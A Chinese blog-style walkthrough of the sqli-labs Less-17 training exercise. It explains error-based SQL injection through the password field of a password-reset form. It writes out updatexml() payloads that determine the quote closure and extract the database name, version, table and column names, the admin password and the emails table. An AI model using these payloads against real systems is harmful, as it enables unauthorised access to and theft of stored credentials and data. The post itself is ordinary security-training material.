sqli-labs less-17密码重置报错注入

密码重置报错植入

在这里插入图片描述

来到首页面我们看到页面提示【password reset】,说明这是更改密码的注入,也就是说我们知道一个账户名,修改他的密码,所以我们可以在passwd处进行注入。

闭合方式

添加单引号
在这里插入图片描述
有报错
在这里插入图片描述
可以知道闭合方式为单引号

查询数据库名,版本等

构造

uname=admin&passwd=1’ order by 2 --+ &Submit=Submit
确定列数为2

uname=admin&passwd=1’ and updatexml(1,concat(‘~’,(database())),3) #&Submit=Submit
得到数据库名security
在这里插入图片描述

uname=admin&passwd=1’ and updatexml(1,concat(‘~’,(version())),3) #&Submit=Submit
版本

爆数据

数据库

  • uname=admin&passwd=1’ and updatexml(1,concat(‘~’,substring((select group_concat(schema_name) from information_schema.schemata),1,30)),3) #&Submit=Submit
    只需要修改substring函数参数的值就可以得到所有数据库名

表名

  • uname=admin&passwd=1’ and updatexml(1,concat(‘~’,substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,30)),3) #&Submit=Submit
    方法同上

列名

uname=admin&passwd=1’ and updatexml(1,concat(‘~’,substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’),1,30)),3) #&Submit=Submit

数据

  • uname=admin&passwd=1’ and updatexml(1,concat(‘~’,(select password from (select password from users where username=‘admin’) b)),3) #&Submit=Submit
    爆密码该格式针对mysql数据库。

但可以爆其他表

uname=admin&passwd=1’ and (updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name =‘emails’),0x5c),1))#

uname=admin&passwd=1’ and (updatexml (1,concat(0x5c,(select group_concat(id,email_id) from emails),0x5c),1))#
内容

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值